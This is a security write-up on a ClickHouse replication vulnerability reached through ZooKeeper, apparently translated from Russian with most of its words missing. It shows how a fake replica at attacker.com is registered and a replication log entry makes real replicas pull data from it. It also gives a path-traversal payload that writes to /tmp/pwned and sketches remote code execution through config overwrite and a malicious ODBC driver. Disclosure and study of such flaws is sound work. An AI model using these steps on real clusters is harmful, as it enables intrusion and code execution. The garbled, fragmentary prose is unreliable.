
This article tells the story of a very common vulnerability in the ClickHouse replication protocol and also shows how you can expand the attack surface.
ClickHouse — , . ClickHouse Apache ZooKeeper (ZK) .
ZK , ZK , Kafka, Hadoop, ClickHouse .
ZooKeeper
0day Java , , ZooKeeper, ClickHouse.
ClickHouse DDL, ZK — /clickhouse/task_queue/ddl.
/clickhouse/task_queue/ddl/query-0001 :
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']
host1 host2 test . DDL CREATE/ALTER/DROP.
ClickHouse , ZK , . (ZK , chXX — , foobar — ):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;
columns metadata.
/clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
? , (TCP/9009) chXX-address firewall . ?
ZK, /clickhouse/tables/01-01/foobar/replicas/chXX host.
/clickhouse/tables/01-01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
, , — ZK /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX , , ):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2
source_replica — , , block_id — , get — "get block" ( ).
, , ( , HTTP). attacker.com :
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX
XXX — . ClickHouse HTTP. , , ZooKeeper, , .
/var/lib/clickhouse ( - ):
flags — , ;
tmp — ;
user_files — (INTO OUTFILE );
metadata — sql ;
preprocessed_configs — /etc/clickhouse-server;
data — , ( /var/lib/clickhouse/data/default).
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2
file_name WriteBufferFromFile. , clickhouse. , , ( ):
\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper
../../../../../../../../../tmp/pwned /tmp/pwned hellofromzookeeper.
(RCE).
RCE
ClickHouse clickhouse -. XML, , /var/lib/clickhouse/preprocessed_configs. . /etc/clickhouse-server , . ClickHouse -, — . ClickHouse, , root.
ODBC RCE
clickhouse, /nonexistent. , , /nonexistent clickhouse (! . ).
ClickHouse ODBC . ODBC (.so). ClickHouse , odbc-bridge, . , , ?
~/.odbc.ini :
[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
SELECT * FROM odbc('DSN=lalala', 'test', 'test'); test.so RCE ( buglloc ).
ClickHouse 19.14.3. ClickHouse ZooKeepers!